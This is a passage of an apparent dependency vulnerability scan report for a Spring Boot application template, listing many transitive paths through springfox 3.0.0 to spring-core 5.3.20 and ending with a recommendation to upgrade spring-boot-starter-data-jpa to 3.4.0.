  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
